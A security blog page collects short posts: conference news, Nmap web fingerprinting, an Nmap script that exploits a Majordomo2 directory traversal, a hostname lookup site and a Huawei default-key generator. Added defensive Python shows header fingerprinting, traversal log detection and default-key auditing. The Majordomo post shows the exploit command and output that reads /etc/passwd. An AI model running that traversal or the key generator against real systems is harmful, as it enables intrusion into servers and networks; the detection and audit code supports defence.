Web security

GuadalajaraCON: Call For Papers

by Paulino Calderon on Tue, Feb 14 2012 18:46:00
The Call For Papers for GuadalajaraCON http://guadalajaracon.org is out. Here it is for anyone who wants to share information at this event: http://www.guadalajaracon.org/call-for-papers/

Web pentesting with Nmap NSE

by Paulino Calderon on Thu, Dec 29 2011 04:31:00

A few months ago I submitted an article to Pentest Magazine called "Gathering web server information with Nmap NSE".

Excerpt

HTTP response analysis with Nmap

Widely used protocols are always at the mercy of the developers implementing them, and HTTP is no exception. Specially crafted requests make each web server behave in its own way, and this allows us to do some nifty tricks to fingerprint them.
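The excerpt describes fingerprinting a web server from how it answers a request. As an added example (not code from the article or from Nmap), the Python below parses raw HTTP responses and fingerprints the server from two independent signals: the Server banner and the order in which headers are emitted. The three sample responses and the header-order signature table are constructed for the demonstration and are assumptions, not a verified signature database; the useful check is the last one, which flags a banner that disagrees with the header order (a rewritten banner or a reverse proxy in front of the origin).

```python
from typing import Dict, List, Tuple

# Constructed sample responses (not real captures) from three hypothetical servers.
SAMPLE_RESPONSES: Dict[str, str] = {
    "alpha": (
        "HTTP/1.1 404 Not Found\r\n"
        "Date: Thu, 29 Dec 2011 04:31:00 GMT\r\n"
        "Server: Apache/2.2.3 (CentOS)\r\n"
        "Content-Type: text/html; charset=iso-8859-1\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ),
    "beta": (
        "HTTP/1.1 404 Not Found\r\n"
        "Server: nginx/1.0.10\r\n"
        "Date: Thu, 29 Dec 2011 04:31:00 GMT\r\n"
        "Content-Type: text/html\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ),
    # Banner claims Apache, but the header order matches the nginx-like family:
    # a rewritten banner, or a proxy answering on behalf of the origin.
    "gamma": (
        "HTTP/1.1 404 Not Found\r\n"
        "Server: Apache\r\n"
        "Date: Thu, 29 Dec 2011 04:31:00 GMT\r\n"
        "Content-Type: text/html\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ),
}

# Hypothetical header-order signatures keyed on the first three header names.
ORDER_SIGNATURES: Dict[Tuple[str, ...], str] = {
    ("date", "server", "content-type"): "apache-like",
    ("server", "date", "content-type"): "nginx-like",
}

# Which order family we expect to accompany a given banner keyword.
BANNER_FAMILY: Dict[str, str] = {"apache": "apache-like", "nginx": "nginx-like"}


def parse_response(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw HTTP response into its status line and an ordered header list."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status_line = lines[0]
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate junk lines instead of aborting the analysis
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return status_line, headers


def fingerprint(raw: str) -> Dict[str, object]:
    """Fingerprint a server from header order and banner, flagging disagreement."""
    status_line, headers = parse_response(raw)
    names = tuple(n for n, _ in headers)
    order_guess = ORDER_SIGNATURES.get(names[:3], "unknown")
    banner = next((v for n, v in headers if n == "server"), "")
    banner_family = next(
        (fam for kw, fam in BANNER_FAMILY.items() if kw in banner.lower()), "unknown"
    )
    mismatch = (
        banner_family != "unknown"
        and order_guess != "unknown"
        and banner_family != order_guess
    )
    return {
        "status": status_line,
        "server_banner": banner,
        "header_order": names,
        "guess": order_guess,
        "banner_mismatch": mismatch,
    }


if __name__ == "__main__":
    for label, raw in SAMPLE_RESPONSES.items():
        print(label, fingerprint(raw))
```

Header order is only one behavioural signal; a real fingerprinter would combine it with the status line wording, error-page bodies and responses to malformed requests, as the article describes.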

Exploiting Majordomo2 with Nmap

by Paulino Calderon on Tue, Jun 28 2011 18:42:00

This is my Nmap script http-majordomo2-dir-traversal; it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it.

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT   STATE SERVICE
80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
| 
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri - URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile - If set it saves the remote file to this location.


Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse
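The script above reads a file such as /etc/passwd through the mj_wwwusr CGI. From the defender's side, the same activity shows up in the web server's access log. As an added example (not part of the post or of Nmap), the Python below scans constructed Apache-style log lines for directory traversal attempts: it undoes up to two layers of percent-encoding, unifies path separators, looks for dot-dot-slash sequences and well-known sensitive file names, and notes when the target is the default mj_wwwusr path from the script's arguments. The log lines and the query parameter name are made up for the demonstration and are not Majordomo2's real request format.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed Apache-style access log lines; the "file=" parameter is hypothetical
# and not Majordomo2's real query format. The last line is deliberately unparseable.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jun/2011:18:42:01 +0000] "GET /cgi-bin/mj_wwwusr?file=../../../../etc/passwd HTTP/1.1" 200 1832
10.0.0.7 - - [28/Jun/2011:18:42:05 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [28/Jun/2011:18:42:09 +0000] "GET /cgi-bin/mj_wwwusr?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1832
10.0.0.9 - - [28/Jun/2011:18:42:12 +0000] "GET /docs/%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 404 210
10.0.0.11 - - [28/Jun/2011:18:42:20 +0000] "GET /img/logo..png HTTP/1.1" 200 3000
garbage line that does not parse
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# ".." only counts when it is followed by a separator, so "logo..png" is not flagged.
TRAVERSAL_RE = re.compile(r"\.\.(?:/|$)")
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "win.ini")
MAJORDOMO_URI = "/cgi-bin/mj_wwwusr"  # default uri argument of the NSE script


def normalize_target(target: str) -> str:
    """Undo up to two layers of percent-encoding and unify path separators."""
    decoded = target
    for _ in range(2):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    return decoded.replace("\\", "/")


def analyze_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None if it is clean or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = normalize_target(m.group("target"))
    reasons: List[str] = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append("dot-dot-slash sequence")
    if any(name in decoded for name in SENSITIVE_FILES):
        reasons.append("sensitive file")
    if reasons and decoded.startswith(MAJORDOMO_URI):
        reasons.append("majordomo2 endpoint (CVE-2011-0049)")
    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),  # 200 on a traversal is the worrying case
        "decoded_target": decoded,
        "reasons": reasons,
    }


def find_traversal(log_text: str) -> List[Dict[str, object]]:
    """Scan a whole log and collect the suspicious requests in order."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in find_traversal(SAMPLE_LOG):
        print(finding)
```

Decoding before matching is what catches the `%2F` and `%252e` variants; the status code tells you whether the request was merely attempted (404) or answered (200), which is the line to escalate.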

WhatAreMyHosts.com - IP to hostnames

by Paulino Calderon on Sat, Jun 04 2011 06:11:00

I created a small web application that uses Bing's results to list all the hostnames pointing to an IP address. This is useful for pentesting services like HTTP servers that behave according to the hostname used. Don't abuse it ;) 

http://whataremyhosts.com

WEP/WPA key generator for Huawei gateways

by Paulino Calderon on Sat, Jan 22 2011 00:43:00

We are proud to release our WEP/WPA default key generator for Huawei HG520x and HG530 Gateways. These devices use a weak cipher to generate their default keys and Humberto Ochoa, one of our vulnerability researchers at Websec, did a great job deciphering the algorithm:

Mac2wepkey - WEP/WPA default key generator for Huawei HG520x and HG530 Gateways

Ironically, Prodigy Telmex, the biggest ISP in Mexico, just replaced my old 2Wire router with one of these vulnerable modems, a newer and "better" device (according to their technician, of course, hehe).
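The weakness the post describes is structural: a default key computed from the device's MAC address can be recomputed by anyone who sees the BSSID on the air, and it can never be stronger than the unknown part of that MAC. As an added example (not Mac2wepkey, and not Huawei's algorithm), the Python below uses a made-up stand-in derivation to show the point from the owner's side: an audit that flags networks whose configured key still equals the MAC-derived default, a keyspace bound, and the random alternative a default key should have been drawn from. The inventory, SSIDs, BSSIDs and the toy derivation are all constructed.

```python
import hashlib
import secrets
from typing import Dict, List


def toy_vendor_default_key(bssid: str) -> str:
    """Hypothetical stand-in for a vendor derivation (NOT Huawei's algorithm):
    the default key is a fixed, deterministic function of the broadcast BSSID."""
    mac_bytes = bytes.fromhex(bssid.replace(":", "").replace("-", ""))
    digest = hashlib.md5(mac_bytes).hexdigest()
    return digest[:10].upper()  # 10 hex digits, i.e. a 40-bit WEP-sized key


def random_key(nbytes: int = 16) -> str:
    """What a default key should be: drawn from the OS CSPRNG, unrelated to any
    public identifier, so observing the BSSID reveals nothing about it."""
    return secrets.token_hex(nbytes).upper()


def effective_key_bits(unknown_input_bits: int, key_length_bits: int) -> int:
    """A derived key is never stronger than the secret part of its input. With a
    MAC-derived key the 24-bit vendor OUI is public, leaving at most 24 unknown
    bits however long the key itself is."""
    return min(unknown_input_bits, key_length_bits)


def audit_networks(inventory: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the networks whose configured key still equals the toy default
    derived from their BSSID; anyone in radio range could recompute those."""
    flagged: List[Dict[str, str]] = []
    for net in inventory:
        if net["key"].upper() == toy_vendor_default_key(net["bssid"]):
            flagged.append({
                "ssid": net["ssid"],
                "bssid": net["bssid"],
                "advice": "default key derived from BSSID; rotate to a random key",
            })
    return flagged


# Constructed inventory: two networks left on the toy default, one already rotated.
SAMPLE_INVENTORY: List[Dict[str, str]] = [
    {"ssid": "home-1", "bssid": "00:11:22:AA:BB:CC",
     "key": toy_vendor_default_key("00:11:22:AA:BB:CC")},
    {"ssid": "home-2", "bssid": "00:11:22:DD:EE:FF", "key": random_key()},
    {"ssid": "office", "bssid": "00:11:22:01:02:03",
     "key": toy_vendor_default_key("00:11:22:01:02:03")},
]


if __name__ == "__main__":
    print("effective bits of a MAC-derived 40-bit key:", effective_key_bits(24, 40))
    for hit in audit_networks(SAMPLE_INVENTORY):
        print(hit)
```

The digest in the toy derivation is irrelevant to the conclusion: swapping MD5 for any stronger function changes nothing, because the input is public and only 24 bits of it vary per vendor. That is why the fix is a random key, not a better derivation.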
